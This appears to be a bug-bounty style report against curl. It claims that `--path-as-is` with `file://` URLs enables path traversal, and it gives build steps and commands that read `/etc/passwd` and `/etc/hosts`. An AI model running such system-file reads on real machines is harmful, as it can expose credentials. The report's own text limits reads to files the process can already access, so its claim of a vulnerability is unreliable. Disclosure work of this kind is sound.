arbitrary file read via `file://` path traversal with `--path-as-is`

## Summary: Using `--path-as-is` with a `file://` URL skips normalization of `..` segments allowing reading of any local file the process can access ## Affected version `* curl 8.15.0-DEV (commit 2a9dfe275, June 27, 2025) on Kali Linux 2024.3, x86_64` ## Steps To Reproduce: 1. bulild curl with debug and ASan: ``` git clone https://github.com/curl/curl.git && cd curl autoreconf -fi CFLAGS="-fsanitize=address -g" ./configure --enable-debug --with-openssl make -j$(nproc) ``` 2. read `/etc/passwd`: ``` ./src/curl --path-as-is file:///../../../../../../../../etc/passwd ``` 3. read `/etc/hosts`: ``` ./src/curl --path-as-is file:///../../../../../../../../etc/hosts ``` ## Mitigation: Normalize and sanitize `..` segments in the file-URL handler even when `--path-as-is` is used, or disallow its use on local paths. ## Impact ## Summary: Disclosure of any world-readable file e.g. `/etc/passwd`, `/etc/hosts`, private keys